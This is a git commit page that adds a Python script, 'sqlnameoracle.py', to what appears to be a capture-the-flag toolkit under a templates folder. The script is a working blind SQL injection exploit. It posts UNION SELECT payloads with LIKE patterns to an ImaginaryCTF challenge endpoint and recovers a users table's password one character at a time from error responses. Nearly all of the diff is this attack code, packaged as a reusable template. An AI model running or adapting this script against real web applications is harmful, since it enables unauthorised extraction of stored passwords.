diff options
| author | dusoleil <howcansocksbereal@gmail.com> | 2021-08-01 23:25:54 -0400 |
|---|---|---|
| committer | dusoleil <howcansocksbereal@gmail.com> | 2021-08-01 23:25:54 -0400 |
| commit | 28179e084e0c45137d62b4fe7b8dc9826bfd2fab (patch) | |
| tree | 73a3fd199f4ea4162a270685df9c26731dc3a348 /templates | |
| parent | 9fc044075cfde81ff351766dcee3bc99d89b6951 (diff) | |
| download | lib-des-gnux-28179e084e0c45137d62b4fe7b8dc9826bfd2fab.tar.gz lib-des-gnux-28179e084e0c45137d62b4fe7b8dc9826bfd2fab.zip | |
Adding Various Small Tools
Signed-off-by: dusoleil <howcansocksbereal@gmail.com>
Diffstat (limited to 'templates')
| -rwxr-xr-x | templates/sqlnameoracle.py | 35 |
1 files changed, 35 insertions, 0 deletions
diff --git a/templates/sqlnameoracle.py b/templates/sqlnameoracle.py new file mode 100755 index 0000000..cec6d98 --- /dev/null +++ b/templates/sqlnameoracle.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python3 + +import string +import requests + +url = "https://awkward-bypass.chal.imaginaryctf.org/user" + +base = '\' UNION SELECT username, NULL FROM users WHERE ' +#base += 'username LIKE \'' +base += 'password LIKE \'' +tail = '%\' ESCAPE \'!\' --' +soln = '' + +while True : + found = False + for c in string.printable[:95]: + ch = c + if ch in '%[]^-!': + continue + if ch == '_': + ch = '!_' + test = soln + ch + payload = base + test + tail + code = 400 + while code != 200: + r = requests.post(url,data={'username':payload,'password':'test'}) + code = r.status_code + log = soln+c + print(log+": " if "Error" in r.text else log+": ***********") + if not "Error" in r.text : + found = True + soln += c + break + if not found: + break |